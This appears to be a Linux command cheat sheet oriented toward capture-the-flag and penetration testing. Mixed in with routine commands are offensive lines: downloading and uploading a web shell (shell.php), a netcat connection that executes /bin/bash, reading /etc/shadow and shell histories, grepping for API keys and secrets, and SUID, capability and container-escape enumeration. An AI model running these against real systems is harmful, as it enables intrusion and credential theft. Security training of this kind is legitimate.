Linux Commands Cheat Sheet
#FILE OPERATIONS
# Find files by name (case-insensitive)
find / -iname "*flag*" 2>/dev/null
# Find recently modified (last 10 min)
find / -mmin -10 -type f 2>/dev/null
# Find large files (>50MB)
find / -size +50M -type f 2>/dev/null
# Find files owned by user
find / -user www-data -type f 2>/dev/null
# Find writable directories
find / -writable -type d 2>/dev/null
# Find files with specific permissions (SUID 4755)
find / -perm -4000 -type f 2>/dev/null
# Find SGID files (2755)
find / -perm -2000 -type f 2>/dev/null
# Find world-writable files
find / -perm -o+w -type f 2>/dev/null
# grep recursive with context
grep -rn "password" . --include="*.txt" -A 2 -B 2
grep -rn "API_KEY\|SECRET\|token" /var/www 2>/dev/null
# grep invert match (exclude)
grep -v "comment\|#\|^$" file.txt
# sed in-place replace
sed -i 's/old/new/g' file.txt
sed -i 's/127.0.0.1/10.10.14.5/g' config.php
# awk print column
awk -F':' '{print $1}' /etc/passwd
awk '{print $1, $NF}' access.log
# cut by delimiter
cut -d':' -f1 /etc/shadow
# sort + uniq counts
cat access.log | sort | uniq -c | sort -rn
# wc line/word/char count
wc -l passwords.txt
# xargs parallel
find . -name "*.txt" | xargs grep "admin"
find . -name "*.txt" -print0 | xargs -0 -P4 grep "admin"
BASH
#TEXT PROCESSING
# tr for char replacement / newline splitting
echo $PATH | tr ':' '\n'
cat file | tr -s '\n' # squeeze blank lines
cat file | tr '[:upper:]' '[:lower:]'
# diff two files
diff file1.txt file2.txt
# strings + filter
strings /usr/bin/binary | grep -i "password\|flag\|secret"
# base64
echo -n "text" | base64
echo "dGV4dA==" | base64 -d
# xxd hex dump
xxd file.bin | head
# head / tail
tail -f /var/log/apache2/access.log
head -n 20 largefile.txt
tail -n +5 file.txt # skip first 4 lines
# tee (write to file + stdout)
command | tee output.txt
command 2>&1 | tee output.txt
# jq JSON parsing
curl -s http://target/api | jq '.users[] | .name'
cat data.json | jq -r '.[] | select(.enabled==true) | .id'
BASH
#PROCESS MANAGEMENT
# List all processes
ps aux
ps -ef
ps auxf # tree view
# Filter by name
ps aux | grep apache
pgrep -a mysql
pgrep -u root
# top/htop (interactive)
top -u www-data
htop
# Background/foreground
Ctrl+Z # suspend
bg # resume in background
fg # bring to foreground
# kill signals
kill -l # list signals
kill -9 PID # SIGKILL
kill -15 PID # SIGTERM (graceful)
killall -9 process_name
pkill -u username
# jobs list
jobs -l
# Run in background
command &
nohup command & # survive shell exit
BASH
#NETWORK
# ss (socket stats, modern netstat)
ss -tlnp # TCP listening
ss -ulnp # UDP listening
ss -anp # all connections
# ip (modern ifconfig/route)
ip a # interfaces
ip r # routing table
ip neigh # ARP table
# curl
curl -s http://target # silent
curl -I http://target # headers only
curl -X POST -d "user=admin&pass=test" http://target/login
curl -H "Cookie: session=abc" http://target/admin
curl -x http://proxy:8080 http://target
curl -k https://target # ignore cert errors
curl -o file.bin http://target/file # download to file
curl --upload-file shell.php http://target/uploads/
# wget
wget http://10.10.14.5:8000/shell.php -O /tmp/shell.php
wget -r http://target # recursive mirror
# Netcat (nc)
nc -lvnp 4444 # listener
nc target 4444 -e /bin/bash # connect + exec (traditional)
nc -w 3 target 80 # timeout scan
nc -zv target 20-100 # port scan
nc -nvlp 4444 > received.txt # receive file
# DNS
host target.com
dig target.com ANY
dig -x 10.10.10.5 # reverse lookup
nslookup target.com
BASH
#USER / GROUP INFO
id # current user info
whoami # username
groups # groups for current user
groups username # groups for specific user
last # login history
who # logged-in users
w # logged-in users + activity
# Password files
cat /etc/passwd | grep -v "nologin\|false"
cat /etc/shadow 2>/dev/null | grep -v "!\|\*"
# Sudo
sudo -l # list allowed commands
sudo -u username command # run as another user
sudo -i # interactive root shell
# su
su username
su - username # login shell (loads profile)
# History
history
cat ~/.bash_history
cat ~/.zsh_history
cat /var/log/auth.log | grep "COMMAND"
BASH
#SERVICE MANAGEMENT
# systemctl
systemctl list-units --type=service
systemctl status apache2
systemctl start|stop|restart apache2
systemctl enable|disable apache2
systemctl list-timers
# service (SysVinit)
service apache2 status
service apache2 start|stop|restart
# Check running services
netstat -tlnp | head -20
ss -tlnp | head -20
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
crontab -l
crontab -u username -l
grep -r "curl\|wget\|nc" /etc/cron* /var/spool/cron/ 2>/dev/null
# Process info
cat /proc/version
cat /proc/cpuinfo | head
cat /proc/meminfo | head
ls -la /proc/*/cwd 2>/dev/null # process working dirs
BASH
#ARCHIVES
# tar
tar -czf archive.tar.gz /path/to/files # create .tar.gz
tar -xf archive.tar # extract
tar -xzf archive.tar.gz # extract .tar.gz
tar -xjf archive.tar.bz2 # extract .tar.bz2
# zip / unzip
zip -r archive.zip /path
unzip archive.zip
unzip -l archive.zip # list contents
unzip -P password archive.zip # with password
# gzip / gunzip
gzip file.txt # compresses to file.txt.gz
gunzip file.txt.gz
# 7z
7z a archive.7z /path
7z x archive.7z # extract with paths
7z l archive.7z # list contents
7z x archive.7z -psecret123 # with password
# cpio
cpio -idmv < archive.cpio
BASH
#PERMISSIONS
# chmod
chmod 755 file # rwxr-xr-x
chmod 644 file # rw-r--r--
chmod +x script.sh # add execute
chmod u+s /path/binary # set SUID
chmod g+s /path/dir # set SGID
# Numeric table: r=4 w=2 x=1, sum per user/group/other
# 777 = rwxrwxrwx 755 = rwxr-xr-x
# 644 = rw-r--r-- 600 = rw-------
# 4000 = SUID 2000 = SGID 1000 = sticky
# chown
chown user:group file
chown -R user:group /path
# ACL
getfacl file
setfacl -m u:username:rwx file
setfacl -m g:groupname:r-- file
setfacl -b file # remove all ACLs
# Special bits
ls -la | grep "^........r" # world-readable
ls -la | grep "^......rwx" # world-writable
find / -perm -4000 -ls 2>/dev/null # SUID files with details
find / -perm -2 -type f 2>/dev/null # write-permission for some group
BASH
#ADVANCED SEARCH EXAMPLES
# SUID binaries (4 variants)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null
find / -perm -4000 -user root -not -path "/usr/share/*" 2>/dev/null
# SGID
find / -perm -2000 -type f 2>/dev/null
# World-writable files
find / -perm -o+w -type f 2>/dev/null
find / -perm -2 ! -type l -ls 2>/dev/null
# Writable directories
find / -type d -writable 2>/dev/null
# Files not owned by any user (orphaned UID)
find / -nouser -o -nogroup 2>/dev/null
# Find by group ownership
find / -group adm -type f 2>/dev/null
# Find by size
find / -size +10M -size -100M -type f 2>/dev/null
find / -size +0c -type f 2>/dev/null # non-empty files
# Find by time
find / -mtime -1 -type f 2>/dev/null # modified within 24h
find / -atime -7 -type f 2>/dev/null # accessed within 7 days
find / -ctime +30 -type f 2>/dev/null # changed over 30 days ago
# Find by type
find / -type f # regular file
find / -type d # directory
find / -type l # symlink
find / -type b -o -type c # block/character device
# Combine: SUID + writable by group
find / -perm -4000 -perm -2000 -type f 2>/dev/null
BASH
#BASH SHORTCUTS
!! # repeat last command
!$ # last argument of previous command
!* # all arguments of previous command
!grep # last command starting with "grep"
Ctrl+R # reverse search history
Ctrl+A / Ctrl+E # jump to start/end of line
Ctrl+W # delete word backward
Ctrl+U # delete to start of line
Ctrl+L # clear screen
Alt+. # insert last argument
BASH
#CAPABILITY SCANNING
# Capability scanning
getcap -r / 2>/dev/null # Find all files with capabilities
capsh --print # Print current process capabilities
# Docker/container escape checks
docker ps # List running containers
id | grep docker # Check if user is in docker group
cat /proc/1/cgroup 2>/dev/null | grep -E 'docker|kubepods' # Check if inside container
# Service and log analysis
systemd-analyze blame # Show services by boot time
journalctl -u ssh -n 50 --no-pager # Last 50 SSH journal entries
journalctl -u cron -n 50 --no-pager # Last 50 cron entries
BASH